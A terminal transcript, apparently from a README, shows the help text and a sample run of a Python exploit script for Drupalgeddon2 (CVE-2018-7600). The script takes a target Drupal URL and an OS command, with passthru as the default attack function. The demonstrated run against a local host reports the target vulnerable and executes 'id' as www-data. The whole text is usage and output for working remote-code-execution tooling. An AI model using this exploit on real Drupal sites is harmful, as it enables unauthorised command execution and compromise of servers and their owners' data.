$ python3 drupalgeddon.py -h
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
usage: drupalgeddon.py [-h] --url URL [--command COMMAND] [--function FUNCTION] [--test] [--proxy PROXY]
[!] This script exploits (CVE-2018-7600) a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.
optional arguments:
-h, --help show this help message and exit
--url URL, -u URL URL of target Drupal site (ex: http://target.com/)
--command COMMAND, -c COMMAND OS Command to execute
--function FUNCTION, -f FUNCTION Function to use as attack vector (default = passthru)
--test Test if target is vulnerable
--proxy PROXY, -p PROXY Configure a proxy in the format http://127.0.0.1:8080/ (default = none)
$ python3 drupalgeddon.py -u http://127.0.0.1 --test -c id
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
[+] Sending request to: http://127.0.0.1
[+] Testing if: http://127.0.0.1 is vulnerable
[!] Target is vulnerable to CVE-2018-7600
[+] Triggering exploit to execute: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)